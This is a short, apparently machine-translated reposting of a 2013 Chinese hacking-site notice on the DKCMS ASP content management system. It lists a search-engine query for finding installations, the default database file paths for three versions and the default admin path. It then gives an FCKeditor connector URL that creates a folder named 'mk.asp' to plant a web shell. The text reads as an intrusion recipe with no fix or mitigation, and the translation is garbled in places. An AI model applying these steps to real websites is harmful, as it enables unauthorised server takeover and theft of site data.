The movable section(dkcms)vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201336692
Type myhack58
Reporter 佚名
Modified 2013-01-13T00:00:00


The main is almost 3 versions of main, v2. 0 v3. 1 v4. 2

Google keyword: powered by dkcms

The website turned out to find the source code download, Baidu, download this 3 source code, as is the asp source code, mostly to look at the default database, what are the three default database

V2. 0 data/dkcm_ssdfhwejkfs. mdb

V3. 1 _data/___dkcms_3 0_free. mdb

V4. 2 _data/I^(()UU()H. mdb

The default backend is: admin


These are, thus, official Safety awareness quite poor, as for the background holding shell, the fck editor breakthrough can take the shell

The establishment of the asp folder

Fck the path:

Admin/FCKeditor/editor/filemanager/connectors/asp/connector. asp? Command=CreateFolder&Type=Image&CurrentFolder=/mk. asp&NewFolderName=mk. asp